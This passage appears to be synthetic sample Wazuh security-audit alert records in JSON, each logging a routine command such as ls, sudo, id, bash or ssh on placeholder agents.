/usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: 